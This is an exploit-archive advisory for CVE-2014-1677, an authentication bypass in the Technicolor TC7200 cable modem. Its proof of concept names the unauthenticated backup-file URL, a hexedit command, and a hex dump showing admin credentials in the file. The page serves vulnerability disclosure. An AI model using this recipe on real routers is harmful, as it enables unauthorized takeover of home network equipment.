Technicolor TC7200 Authentication Bypass

2014.02.25

Credit: Jeroen - IT Nerdbox

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

 Exploit Title: Technicolor TC7200: Authentication Bypass
# Google Dork: N/A
# Date: 24-02-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.technicolor.com/
# Software Link:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
ays/cable-modems-gateways/tc7200-tc7300
# Version: STD6.01.12
# Tested on: N/A
# CVE : CVE-2014-1677
#
## Description:
#
# Any user on the internal network can download a backup configuration file
without authenticating first. The backup file contains
# the credentials to the administrative web interface.
#
## PoC:
#
# Download the file: http://192.168.0.1/goform/system/GatewaySettings.bin
#
# Using the command: $ hexedit -C GatewaySettings.bin
#
# 00006590 00 00 00 00 00 00 00 00 30 4d 4c 6f 67 00 06 00
|........0MLog...|
# 000065a0 05 61 64 6d 69 6e 00 15 6d 79 73 75 70 65 72 73
|.admin..mysupers|
# 000065b0 65 63 72 65 74 70 61 73 73 77 6f 72 64 00 06 75
|ecretpassword..u|
# 000065c0 70 63 63 73 72 00 00
|pccsr..|
# 000065c7
#
#
# More information can be found at:
http://www.nerdbox.it/technicolor-tc7200-auth-bypass-dos/

References:

http://www.nerdbox.it/technicolor-tc7200-auth-bypass-dos/

http://www.technicolor.com/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Technicolor TC7200 Authentication Bypass

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.